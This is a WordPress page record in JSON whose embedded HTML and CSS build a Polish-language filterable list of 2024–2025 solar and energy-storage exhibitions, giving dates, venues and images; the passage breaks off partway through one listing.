{"id":22209,"date":"2026-03-18T14:39:32","date_gmt":"2026-03-18T13:39:32","guid":{"rendered":"https:\/\/chisagepolska.pl\/?page_id=22209"},"modified":"2026-03-20T04:02:42","modified_gmt":"2026-03-20T03:02:42","slug":"wystawa","status":"publish","type":"page","link":"https:\/\/chisagepolska.pl\/index.php\/wystawa\/","title":{"rendered":"wystawa"},"content":{"rendered":"<p><img decoding=\"async\" width=\"1920\" height=\"600\" src=\"https:\/\/chisagepolska.pl\/wp-content\/uploads\/2026\/03\/Exhibition-Banner-Image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/chisagepolska.pl\/wp-content\/uploads\/2026\/03\/Exhibition-Banner-Image.jpg 1920w, https:\/\/chisagepolska.pl\/wp-content\/uploads\/2026\/03\/Exhibition-Banner-Image-300x94.jpg 300w, https:\/\/chisagepolska.pl\/wp-content\/uploads\/2026\/03\/Exhibition-Banner-Image-1024x320.jpg 1024w, https:\/\/chisagepolska.pl\/wp-content\/uploads\/2026\/03\/Exhibition-Banner-Image-768x240.jpg 768w, https:\/\/chisagepolska.pl\/wp-content\/uploads\/2026\/03\/Exhibition-Banner-Image-1536x480.jpg 1536w\" sizes=\"auto, (max-width: 1920px) 100vw, 1920px\" \/><br \/>\n\t\t\t<!doctype html><br \/>\n<html lang=\"pl\"><br \/>\n<head><br \/>\n  <meta charset=\"UTF-8\" \/><br \/>\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" \/><br \/>\n  <title>Przegl\u0105d wystaw mi\u0119dzynarodowych &#8211; CHISAGE ESS<\/title><\/p>\n<style>\n    \/* ========================================\n       \u65b0\u80fd\u6e90\u50a8\u80fd\u5c55\u4f1a\u9875\u9762\u6837\u5f0f\n       \u9002\u7528\u4e8eWordPress Elementor HTML\u5757\n       ======================================== *\/\n    \/* \u91cd\u7f6e\u6837\u5f0f - \u53ea\u5f71\u54cd\u5f53\u524d\u7ec4\u4ef6 *\/\n    .exhibition-wrapper * {\n      margin: 0;\n      padding: 0;\n      box-sizing: border-box;\n    }\n    .exhibition-wrapper {\n      --primary: #c45c5c;\n      --primary-light: #f5e6e6;\n      --gray-100: #f5f5f5;\n      --gray-200: #e8e8e8;\n      --gray-500: #737373;\n      --text-primary: #1a1a1a;\n      --text-secondary: #525252;\n      --text-muted: #737373;\n      --border: #e8e8e8;\n      --spacing-xs: 0.5rem;\n      --spacing-sm: 0.75rem;\n      --spacing-md: 1rem;\n      --spacing-lg: 1.5rem;\n      --spacing-xl: 2rem;\n      --radius-sm: 4px;\n      --radius-md: 8px;\n      --radius-lg: 12px;\n      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;\n      max-width: 1200px;\n      margin: 0 auto;\n      padding: 0 16px;\n    }\n    \/* \u6807\u9898 *\/\n    .exhibition-wrapper .section-title {\n      font-size: 1.5rem;\n      font-weight: 600;\n      color: var(--text-primary);\n      margin-bottom: var(--spacing-lg);\n    }\n    \/* \u7b5b\u9009\u7ec4 *\/\n    .exhibition-wrapper .filter-group {\n      margin-bottom: var(--spacing-md);\n    }\n    .exhibition-wrapper .filter-label {\n      display: block;\n      font-size: 0.875rem;\n      font-weight: 500;\n      color: var(--text-secondary);\n      margin-bottom: var(--spacing-sm);\n    }\n    .exhibition-wrapper .filter-tabs {\n      display: flex;\n      gap: var(--spacing-xs);\n      flex-wrap: wrap;\n    }\n    .exhibition-wrapper .filter-tab {\n      padding: var(--spacing-sm) var(--spacing-lg);\n      font-size: 0.875rem;\n      font-weight: 500;\n      color: var(--text-secondary);\n      background: #f0f0f0;\n      border: 1px solid transparent;\n      border-radius: var(--radius-md);\n      cursor: pointer;\n      outline: none;\n      transition: all 0.25s cubic-bezier(0.4, 0, 0.2, 1);\n    }\n    .exhibition-wrapper .filter-tab:hover {\n      background: #e5e5e5;\n      color: var(--text-primary);\n      transform: translateY(-1px);\n    }\n    .exhibition-wrapper .filter-tab.active {\n      background: var(--primary);\n      color: #fff;\n      border-color: var(--primary);\n    }\n    .exhibition-wrapper .filter-tab:active {\n      transform: translateY(0);\n    }\n    \/* \u5c55\u4f1a\u7f51\u683c *\/\n    .exhibition-wrapper .exhibition-grid {\n      display: grid;\n      grid-template-columns: repeat(3, 1fr);\n      gap: var(--spacing-lg);\n      margin-top: var(--spacing-xl);\n    }\n    \/* \u5c55\u4f1a\u5361\u7247 *\/\n    .exhibition-wrapper .exhibition-card {\n      background: #fff;\n      border-radius: var(--radius-lg);\n      overflow: hidden;\n      border: 1px solid var(--border);\n      opacity: 0;\n      transform: translateY(20px);\n      transition: opacity 0.5s cubic-bezier(0.4, 0, 0.2, 1),\n                  transform 0.5s cubic-bezier(0.4, 0, 0.2, 1),\n                  box-shadow 0.35s cubic-bezier(0.4, 0, 0.2, 1);\n      will-change: transform, opacity;\n    }\n    .exhibition-wrapper .exhibition-card.visible {\n      opacity: 1;\n      transform: translateY(0);\n    }\n    .exhibition-wrapper .exhibition-card.hidden {\n      display: none;\n    }\n    \/* \u5361\u7247\u60ac\u505c\u6548\u679c *\/\n    .exhibition-wrapper .exhibition-card.hovered {\n      transform: translateY(-8px);\n      box-shadow: 0 12px 40px rgba(0,0,0,0.12), 0 4px 12px rgba(0,0,0,0.08);\n    }\n    \/* \u56fe\u7247\u533a\u57df *\/\n    .exhibition-wrapper .card-image {\n      height: 200px;\n      background: var(--gray-100);\n      position: relative;\n      overflow: hidden;\n      cursor: pointer;\n    }\n    .exhibition-wrapper .card-image img {\n      width: 100%;\n      height: 100%;\n      object-fit: cover;\n      opacity: 0;\n      transition: opacity 0.4s ease, transform 0.5s cubic-bezier(0.4, 0, 0.2, 1);\n      will-change: transform;\n    }\n    .exhibition-wrapper .card-image img.loaded {\n      opacity: 1;\n    }\n    .exhibition-wrapper .card-image img.zoomed {\n      transform: scale(1.08);\n    }\n    \/* \u72b6\u6001\u5fbd\u7ae0 - \u59cb\u7ec8\u663e\u793a *\/\n    .exhibition-wrapper .card-badge {\n      position: absolute;\n      top: 12px;\n      right: 12px;\n      padding: 6px 12px;\n      font-size: 0.75rem;\n      font-weight: 600;\n      border-radius: var(--radius-sm);\n      text-transform: uppercase;\n      z-index: 2;\n      background: var(--gray-500);\n      color: #fff;\n    }\n    \/* \u5185\u5bb9\u533a\u57df *\/\n    .exhibition-wrapper .card-content {\n      padding: var(--spacing-lg);\n    }\n    .exhibition-wrapper .card-continent {\n      display: inline-block;\n      padding: 4px 10px;\n      font-size: 0.75rem;\n      font-weight: 500;\n      color: var(--primary);\n      background: var(--primary-light);\n      border-radius: var(--radius-sm);\n      margin-bottom: var(--spacing-sm);\n    }\n    .exhibition-wrapper .card-title {\n      font-size: 1.125rem;\n      font-weight: 600;\n      color: var(--text-primary);\n      margin-bottom: var(--spacing-sm);\n      line-height: 1.4;\n      transition: color 0.3s ease;\n    }\n    .exhibition-wrapper .card-meta {\n      display: flex;\n      flex-direction: column;\n      gap: var(--spacing-xs);\n    }\n    .exhibition-wrapper .meta-item {\n      display: flex;\n      align-items: center;\n      gap: var(--spacing-xs);\n      font-size: 0.875rem;\n      color: var(--text-secondary);\n    }\n    .exhibition-wrapper .meta-icon {\n      width: 16px;\n      height: 16px;\n      color: var(--text-muted);\n      flex-shrink: 0;\n    }\n    \/* \u56fe\u7247\u9884\u89c8\u5f39\u7a97 *\/\n    .exhibition-wrapper .preview-overlay {\n      position: fixed;\n      top: 0;\n      left: 0;\n      right: 0;\n      bottom: 0;\n      background: rgba(0,0,0,0);\n      z-index: 99999;\n      display: none;\n      align-items: center;\n      justify-content: center;\n      opacity: 0;\n      transition: background 0.35s ease, opacity 0.35s ease;\n    }\n    .exhibition-wrapper .preview-overlay.active {\n      display: flex;\n      background: rgba(0,0,0,0.92);\n      opacity: 1;\n    }\n    .exhibition-wrapper .preview-image {\n      max-width: 95vw;\n      max-height: 90vh;\n      object-fit: contain;\n      transform: scale(0.95);\n      opacity: 0;\n      transition: transform 0.35s cubic-bezier(0.4, 0, 0.2, 1), opacity 0.35s ease;\n    }\n    .exhibition-wrapper .preview-overlay.active .preview-image {\n      transform: scale(1);\n      opacity: 1;\n    }\n    .exhibition-wrapper .preview-container {\n      position: relative;\n      max-width: 95vw;\n      max-height: 95vh;\n    }\n    .exhibition-wrapper .preview-close {\n      position: absolute;\n      top: -48px;\n      right: 0;\n      width: 40px;\n      height: 40px;\n      background: rgba(255,255,255,0.15);\n      border: none;\n      border-radius: 50%;\n      cursor: pointer;\n      display: flex;\n      align-items: center;\n      justify-content: center;\n      transition: background 0.25s ease, transform 0.25s ease;\n    }\n    .exhibition-wrapper .preview-close:hover {\n      background: rgba(255,255,255,0.25);\n      transform: scale(1.1);\n    }\n    .exhibition-wrapper .preview-close svg {\n      width: 20px;\n      height: 20px;\n      color: #fff;\n    }\n    \/* \u7a7a\u72b6\u6001 *\/\n    .exhibition-wrapper .empty-state {\n      display: none;\n      flex-direction: column;\n      align-items: center;\n      padding: 4rem 2rem;\n      text-align: center;\n    }\n    .exhibition-wrapper .empty-state.show {\n      display: flex;\n    }\n    .exhibition-wrapper .empty-text {\n      color: var(--text-muted);\n    }\n    \/* \u52a0\u8f7d\u5360\u4f4d *\/\n    .exhibition-wrapper .image-placeholder {\n      position: absolute;\n      top: 0;\n      left: 0;\n      width: 100%;\n      height: 100%;\n      background: linear-gradient(90deg, #f0f0f0 25%, #e0e0e0 50%, #f0f0f0 75%);\n      background-size: 200% 100%;\n      animation: shimmer 1.5s infinite;\n    }\n    @keyframes shimmer {\n      0% { background-position: -200% 0; }\n      100% { background-position: 200% 0; }\n    }\n    .exhibition-wrapper .image-placeholder.hidden {\n      display: none;\n    }\n    \/* ========== \u54cd\u5e94\u5f0f\u8bbe\u8ba1 ========== *\/\n    \/* \u5927\u5c4f\u5e55\u684c\u9762 *\/\n    @media (min-width: 1024px) {\n      .exhibition-wrapper .exhibition-grid {\n        grid-template-columns: repeat(3, 1fr);\n      }\n    }\n    \/* \u5e73\u677f\u6a2a\u5c4f *\/\n    @media (min-width: 768px) and (max-width: 1023px) {\n      .exhibition-wrapper .exhibition-grid {\n        grid-template-columns: repeat(2, 1fr);\n      }\n      .exhibition-wrapper .card-image {\n        height: 180px;\n      }\n      .exhibition-wrapper .section-title {\n        font-size: 1.35rem;\n      }\n    }\n    \/* \u5e73\u677f\u7ad6\u5c4f *\/\n    @media (min-width: 576px) and (max-width: 767px) {\n      .exhibition-wrapper .exhibition-grid {\n        grid-template-columns: repeat(2, 1fr);\n        gap: var(--spacing-md);\n      }\n      .exhibition-wrapper .card-image {\n        height: 160px;\n      }\n      .exhibition-wrapper .card-content {\n        padding: var(--spacing-md);\n      }\n      .exhibition-wrapper .card-title {\n        font-size: 1rem;\n      }\n      .exhibition-wrapper .section-title {\n        font-size: 1.25rem;\n      }\n    }\n    \/* \u624b\u673a *\/\n    @media (max-width: 575px) {\n      .exhibition-wrapper {\n        padding: 0 12px;\n      }\n      .exhibition-wrapper .exhibition-grid {\n        grid-template-columns: 1fr;\n        gap: var(--spacing-md);\n      }\n      .exhibition-wrapper .card-image {\n        height: 200px;\n      }\n      .exhibition-wrapper .section-title {\n        font-size: 1.25rem;\n        margin-bottom: var(--spacing-md);\n      }\n      .exhibition-wrapper .filter-tabs {\n        overflow-x: auto;\n        flex-wrap: nowrap;\n        -webkit-overflow-scrolling: touch;\n        padding-bottom: 4px;\n      }\n      .exhibition-wrapper .filter-tab {\n        white-space: nowrap;\n        flex-shrink: 0;\n        padding: 8px 16px;\n        font-size: 0.8125rem;\n      }\n      .exhibition-wrapper .filter-group {\n        margin-bottom: 12px;\n      }\n      .exhibition-wrapper .filter-label {\n        font-size: 0.8125rem;\n      }\n      .exhibition-wrapper .preview-close {\n        top: 16px;\n        right: 16px;\n      }\n      .exhibition-wrapper .card-badge {\n        top: 8px;\n        right: 8px;\n        padding: 4px 8px;\n        font-size: 0.6875rem;\n      }\n    }\n    \/* \u8d85\u5c0f\u5c4f\u5e55\u624b\u673a *\/\n    @media (max-width: 375px) {\n      .exhibition-wrapper .card-title {\n        font-size: 0.9375rem;\n      }\n      .exhibition-wrapper .card-content {\n        padding: 12px;\n      }\n    }\n  <\/style>\n<p><\/head><br \/>\n<body><br \/>\n    <!-- \u7b5b\u9009\u533a\u57df\uff08\u6ce2\u5170\u8bed\uff09 --><\/p>\n<h2>Przegl\u0105d wystaw mi\u0119dzynarodowych<\/h2>\n<p>      <label>Status<\/label><br \/>\n        <button data-status=\"all\">Wszystkie<\/button><br \/>\n        <button data-status=\"upcoming\">Nadchodz\u0105ce<\/button><br \/>\n        <button data-status=\"ongoing\">Trwaj\u0105ce<\/button><br \/>\n        <button data-status=\"ended\">Zako\u0144czone<\/button><br \/>\n      <label>Region<\/label><br \/>\n        <button data-continent=\"all\">Wszystkie<\/button><br \/>\n        <button data-continent=\"asia\">Azja<\/button><br \/>\n        <button data-continent=\"europe\">Europa<\/button><br \/>\n        <button data-continent=\"africa\">Afryka<\/button><br \/>\n        <button data-continent=\"middle-east\">Bliski Wsch\u00f3d<\/button><br \/>\n    <!-- \u5c55\u4f1a\u5217\u8868\uff08\u6240\u6709\u6587\u672c\u5df2\u672c\u5730\u5316\uff09 --><br \/>\n      <!-- Solar Pakistan 2025 --><\/p>\n<article data-continent=\"asia\" data-status=\"ended\" data-date=\"2025-08-15\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2Fsolar+pakistan+2025.jpg&#038;nonce=2eb66565-27ba-45d0-8d33-d5da7b76384d&#038;project_id=7618469051534311465&#038;sign=957d7c4cab3d8c8d68f316e8fbe581f3788e7bdc186fee03b636ba4996f791c1\" alt=\"Solar Pakistan 2025\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Azja<\/p>\n<h3>Solar Pakistan 2025<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              15-17 sierpnia 2025<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Karachi Expo Centre, Pakistan<br \/>\n      <\/article>\n<p>      <!-- ENERH2O 2025 --><\/p>\n<article data-continent=\"europe\" data-status=\"ended\" data-date=\"2025-09-24\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2F%E8%91%A1%E8%90%84%E7%89%99%E5%B1%95%E4%BC%9A.jpg&#038;nonce=e180d426-ee35-4626-a3df-4efd5c41fd33&#038;project_id=7618469051534311465&#038;sign=73a4c4fd7c3a2f429127e726276d6aa4febef3e0c3d4de306cc5f9bf1f419dfb\" alt=\"ENERH2O 2025\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Europa<\/p>\n<h3>ENERH2O 2025<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              24-25 wrze\u015bnia 2025<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              EXPONOR Porto, Portugalia<br \/>\n      <\/article>\n<p>      <!-- EES EUROPE 2025 --><\/p>\n<article data-continent=\"europe\" data-status=\"ended\" data-date=\"2025-05-07\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2FEES%E5%BE%B7%E5%B1%95%E9%82%80%E8%AF%B7%E5%87%BD.jpg&#038;nonce=f352a743-0aba-429f-a756-b3da9e5678ed&#038;project_id=7618469051534311465&#038;sign=fbad8fbce1a3ffc560c6fe091dfcf754d90a4be5eda8ab716e53927e238d6599\" alt=\"EES EUROPE 2025\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Europa<\/p>\n<h3>EES EUROPE 2025<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              7-9 maja 2025<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Messe M\u00fcnchen, Niemcy<br \/>\n      <\/article>\n<p>      <!-- Solar & Storage Live Philippines 2025 --><\/p>\n<article data-continent=\"asia\" data-status=\"ended\" data-date=\"2025-05-19\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2F%E8%8F%B2%E5%BE%8B%E5%AE%BE%E9%82%80%E8%AF%B7%E5%87%BD.jpg&#038;nonce=c8930d00-3a3d-4b3d-bc37-72bb2685aa99&#038;project_id=7618469051534311465&#038;sign=0d8eb2ffde95f0feda951e8ef6523f12f88a5d0eb7a347c46e63d009452a4b56\" alt=\"Solar &#038; Storage Live Philippines 2025\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Azja<\/p>\n<h3>Solar &#038; Storage Live Philippines 2025<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              19-20 maja 2025<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              SMX Convention Center, Manila, Filipiny<br \/>\n      <\/article>\n<p>      <!-- Yiwu Solar PV & Energy Storage Expo 2025 --><\/p>\n<article data-continent=\"asia\" data-status=\"ended\" data-date=\"2025-04-27\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2F%E4%B9%89%E4%B9%8C%E5%B1%95%E4%BC%9A%E9%82%80%E8%AF%B7%E5%87%BD.jpg&#038;nonce=85ae599f-f9c3-4dc3-a05b-42c3d1fbc6c4&#038;project_id=7618469051534311465&#038;sign=d8d378c793c67294b6049783a2e4bd2df4516eafc85a2cabe815dd1a01d25d08\" alt=\"Yiwu Solar PV &#038; Energy Storage Expo\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Azja<\/p>\n<h3>Yiwu Solar PV &#038; Energy Storage Expo 2025<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              27-29 kwietnia 2025<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Yiwu International Expo Center, Chiny<br \/>\n      <\/article>\n<p>      <!-- World Future Energy Summit 2025 --><\/p>\n<article data-continent=\"middle-east\" data-status=\"ended\" data-date=\"2025-01-14\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2F%E9%98%BF%E5%B8%83%E6%89%8E%E6%AF%94%E9%82%80%E8%AF%B7%E5%87%BD.jpg&#038;nonce=30c17b8f-537d-49bf-b2cf-b100ddc6b359&#038;project_id=7618469051534311465&#038;sign=6f220e202aa5e9ff799e6211047f87ca48c31ae6ea87c2b39b8bd9a0500f6d5a\" alt=\"World Future Energy Summit 2025\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Bliski Wsch\u00f3d<\/p>\n<h3>World Future Energy Summit 2025<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              14-16 stycznia 2025<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              ADNEC Abu Dhabi, ZEA<br \/>\n      <\/article>\n<p>      <!-- Solaire Expo Maroc 2025 --><\/p>\n<article data-continent=\"africa\" data-status=\"ended\" data-date=\"2025-02-25\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2F%E6%91%A9%E6%B4%9B%E5%93%A5%E5%B1%95%E4%BC%9A.png&#038;nonce=f9a4ee1e-c4db-4e88-ba46-00db8b748986&#038;project_id=7618469051534311465&#038;sign=f619f4776b9e0e4bc0abf49e22ce84be5bc3da924b6763522dacfbe28e1743c5\" alt=\"Solaire Expo Maroc 2025\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Afryka<\/p>\n<h3>Solaire Expo Maroc 2025<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              25-27 lutego 2025<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Casablanca, Maroko<br \/>\n      <\/article>\n<p>      <!-- ENEX 2025 --><\/p>\n<article data-continent=\"europe\" data-status=\"ended\" data-date=\"2025-02-18\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2F%E6%B3%A2%E5%85%B0%E5%B1%95%E4%BC%9A%E9%82%80%E8%AF%B7%E5%87%BD.jpg&#038;nonce=c85d7224-3f69-4957-a00a-fdeb37a8b8a9&#038;project_id=7618469051534311465&#038;sign=33e2b20f03d370ad858433ca8f000874d0d430b39efdb95f3488e277d38e847d\" alt=\"ENEX 2025\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Europa<\/p>\n<h3>ENEX 2025 &#8211; International Renewable Energy Expo<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              18-19 lutego 2025<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Kielce, Polska<br \/>\n      <\/article>\n<p>      <!-- EES EUROPE 2024 --><\/p>\n<article data-continent=\"europe\" data-status=\"ended\" data-date=\"2024-06-19\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2FEES+EUROPE+2024.jpg&#038;nonce=c9f1353f-6b09-4e0f-9285-47c7e47fd1bb&#038;project_id=7618469051534311465&#038;sign=ffd9b187ec38ac176a8f29d5de8e0cb929470659f905b1cf97ac8a7236c47d49\" alt=\"EES EUROPE 2024\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Europa<\/p>\n<h3>EES EUROPE 2024<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              19-21 czerwca 2024<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Messe M\u00fcnchen, Niemcy<br \/>\n      <\/article>\n<p>      <!-- Solar & Storage Live Philippines 2024 --><\/p>\n<article data-continent=\"asia\" data-status=\"ended\" data-date=\"2024-05-20\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2FSOLAR+%26+STORAGELIVE+PHILIPPINES+2024.jpg&#038;nonce=1325df47-3434-42e7-90db-2e1c6189bbfa&#038;project_id=7618469051534311465&#038;sign=83a04a2d9af027c3c42f595b03440e0a5b06788b8697a182ae4ef7027b36106d\" alt=\"Solar &#038; Storage Live Philippines 2024\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Azja<\/p>\n<h3>Solar &#038; Storage Live Philippines 2024<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              20-21 maja 2024<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              SMX Convention Center, Manila, Filipiny<br \/>\n      <\/article>\n<p>      <!-- World Future Energy Summit 2024 --><\/p>\n<article data-continent=\"middle-east\" data-status=\"ended\" data-date=\"2024-04-16\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2Fworld+future++energy+summit.jpg&#038;nonce=dbf83d3a-1a82-468e-8e69-ab7934a0cb91&#038;project_id=7618469051534311465&#038;sign=7758dfd555aede8d436ebda24a9f34f88bf829f11affc66181cae0bbb69755a8\" alt=\"World Future Energy Summit 2024\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Bliski Wsch\u00f3d<\/p>\n<h3>World Future Energy Summit 2024<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              16-18 kwietnia 